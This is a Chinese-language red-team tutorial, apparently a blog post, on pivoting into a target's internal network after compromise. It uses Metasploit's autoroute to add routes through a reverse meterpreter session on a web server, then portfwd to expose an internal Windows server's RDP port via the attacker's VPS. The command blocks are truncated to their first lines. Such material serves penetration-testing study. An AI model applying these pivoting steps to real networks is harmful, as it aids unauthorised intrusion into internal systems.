利用msf自带的route模块穿透目标内网
MSF的autoroute模块是MSF框架中自带的一个路由转发功能,实现过程是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达我们既可使用MSF来进行探测了
预览内容
先从一个能出网的meterpreter开始
使用msf添加目标内网路由的多种方式
基础环境
VPS: 公网VPS,metasploit所在机器
linux-web服务器:目标能出外网的一台web服务器
Windows-server2008r2:目标一级内网下的一台win服务器,断网机
0x01 获取目标内网meterpreter
准备payload,把linux-web服务器的meterpreter弹回来
1 | use exploit/multi/handler |
0x02 在meterpreter添加路由
第一,通过上一步的ifconfig发现目标存在192.168.0这个网段,因此直接在meterpreter下利用autoroute模块添加到目标的内网192.168.0这个网段的路由
1 | meterpreter > run get_local_subnets //获取当前机器的所有网段信息 |
这样就可以开始探测内网了
第二,在msf终端下,把目标指定的内网段的路由添加在指定的session上
1 | msf > sessions -l |
对于多级代理,在打下一级内网下的机器后,如果发现其有新的网段,依照上面的方法添加新网段的路由即可
0x03 portfwd转发3389
如果想在本地机器上访问192.168.0网段下一台windows server2008 r2机器的3389,可以直接在meterpreter上利用内置的端口转发功能把目标192.168.0内网的windows server2008r 3389转到本地的某个端口上
1 | msf > sessions -i 1 |
最后在本地远程连接目标内网的3389,连接的IP要为你的公网VPS
参考文章
红队攻防揭秘—《45,利用msf自带的route模块穿透目标多级内网》